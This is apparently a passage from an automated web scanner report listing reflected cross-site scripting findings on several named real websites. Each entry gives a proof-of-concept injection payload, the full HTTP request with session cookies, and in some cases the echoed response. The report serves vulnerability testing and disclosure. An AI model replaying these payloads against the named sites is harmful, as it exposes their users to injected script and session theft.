The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.73. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /news/detail.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.75. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /newsandevents
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.76. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /offices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.77. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /practice
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.78. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/practice/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.79. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/privacypolicy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.80. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/probonooverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.81. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/publications
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.82. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/recruitingthebestandbrightest
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Recruiting the Best & Brightest</title> ...[SNIP]... ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]> ...[SNIP]...
4.83. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/retainingourdiversetalent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Retaining Our Diverse Talent</title>
...[SNIP]... on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]> ...[SNIP]...
4.84. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.85. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/termsofuse
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edc1"-alert(1)-"8a5e635d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:47:57 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:47:57 GMT Date: Wed, 19 Jan 2011 15:47:57 GMT Content-Length: 22010 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b36"-alert(1)-"11f428f14f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:02 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:48:03 GMT Date: Wed, 19 Jan 2011 15:48:03 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9d"-alert(1)-"77d9442451f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:08 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:48:08 GMT Date: Wed, 19 Jan 2011 15:48:08 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133fa"-alert(1)-"9a2b6004857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:15 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:48:15 GMT Date: Wed, 19 Jan 2011 15:48:15 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12fdc"-alert(1)-"b91d9019faa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:20 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86367 Expires: Thu, 20 Jan 2011 15:47:47 GMT Date: Wed, 19 Jan 2011 15:48:20 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d392"><script>alert(1)</script>ceb88aaba32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
